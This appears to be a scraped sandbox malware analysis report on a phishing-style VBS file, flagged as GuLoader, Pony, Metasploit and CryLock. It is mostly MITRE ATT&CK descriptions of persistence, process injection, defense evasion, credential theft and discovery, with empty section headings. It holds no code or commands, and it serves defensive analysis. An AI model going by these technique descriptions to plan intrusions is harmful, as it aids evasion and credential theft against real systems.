Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: Pony

Threatname: Metasploit

Threatname: CryLock

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Location Tracking:

Cryptography:

Exploits:

Privilege Escalation:

Bitcoin Miner:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre